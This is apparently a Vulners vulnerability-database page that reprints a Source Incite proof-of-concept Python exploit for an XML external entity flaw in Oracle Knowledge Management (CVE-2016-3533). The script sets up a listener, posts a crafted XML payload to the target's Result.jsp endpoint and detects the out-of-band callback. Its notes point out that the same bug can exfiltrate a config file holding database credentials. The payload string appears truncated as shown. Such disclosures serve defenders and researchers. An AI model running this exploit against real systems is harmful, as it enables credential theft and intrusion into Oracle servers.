Vulners
Lucene search
SRC-2016-0024 : Oracle Knowledge Management Castor Library XML External Entity Injection Information Disclosure Vulnerability
🗓️ 10 Feb 2015 00:00:00Reported by Steven Seeley of Source InciteType 
srcincite🔗 srcincite.io👁 29 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Unspecified Vulnerability in Oracle E-Business Suite Knowledge Management | 21 Jul 201600:00 | – | cnvd |
 | CVE-2016-3533 | 21 Jul 201610:00 | – | cve |
 | CVE-2016-3533 | 21 Jul 201610:00 | – | cvelist |
 | EUVD-2016-4559 | 7 Oct 202500:30 | – | euvd |
 | CVE-2016-3533 | 21 Jul 201610:13 | – | nvd |
 | Oracle Critical Patch Update - July 2016 | 19 Jul 201600:00 | – | oracle |
 | Oracle E-Business Multiple Vulnerabilities (July 2016 CPU) | 20 Jul 201600:00 | – | nessus |
 | Open redirect | 21 Jul 201610:13 | – | prion |
 | CVE-2016-3533 | 21 Jul 201610:00 | – | vulnrichment |
#!/usr/local/bin/python
"""
Oracle Knowledge Management Castor Library XML External Entity Injection Information Disclosure Vulnerability
Found by: Steven Seeley of Source Incite
CVE: CVE-2016-3533
SRC: SRC-2016-0023
Notes:
- You can steal the C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml file via the XXE bug which contains the db user/pass
- This PoC simply performs an Out-of-Band request
Example:
========
saturn:oracle-knowledge mr_me$ ./poc.py
(+) usage: ./poc.py(+) eg: ./poc.py 172.16.175.137 172.16.175.1 nwv25cerqtsxg42qhayn5trb
saturn:oracle-knowledge mr_me$ ./poc.py 172.16.175.137 172.16.175.1
(+) starting xxe server...
(+) launching xxe attack...
(!) triggered xxe attack!
"""
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
import threading
import sys
import time
import requests
# stfu
requests.packages.urllib3.disable_warnings()
class xxe(BaseHTTPRequestHandler):
# stfu
def log_message(self, format, *args):
return
def do_GET(self):
# if we land here, the target is vuln
print "(!) triggered xxe attack!"
self.send_response(200)
self.end_headers()
message = threading.currentThread().getName()
self.wfile.write(message)
self.wfile.write('\n')
return
if __name__ == '__main__':
if len(sys.argv) != 3:
print "(+) usage: %s" % sys.argv[0]
print "(+) eg: %s 172.16.175.137 172.16.175.1" % sys.argv[0]
sys.exit(1)
t = sys.argv[1]
x = sys.argv[2]
try:
server = HTTPServer(('0.0.0.0', 9090), xxe)
print '(+) starting xxe server...'
# we just handle a single request in a thread so we can make the remote xxe attack
http = threading.Thread(target=server.handle_request).start()
print "(+) launching xxe attack..."
# setup our oob xxe attack
xml = ""
xml += "%%xxe;]>" % x
# data & headers
h = {'content-type': 'application/x-www-form-urlencoded'}
d = {'method' : '2', 'inputXml': xml }
url = "http://%s:8226/imws/Result.jsp" % t
# fire, and if we hit our webserver, the target is vuln ;-)
requests.post(url, headers=h, data=d)
except KeyboardInterrupt:
print '(+) shutting down the web server'
server.socket.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jul 2016 00:00Current
4.9Medium risk
Vulners AI Score4.9
CVSS 24.3
CVSS 34.7
EPSS0.00794
SSVC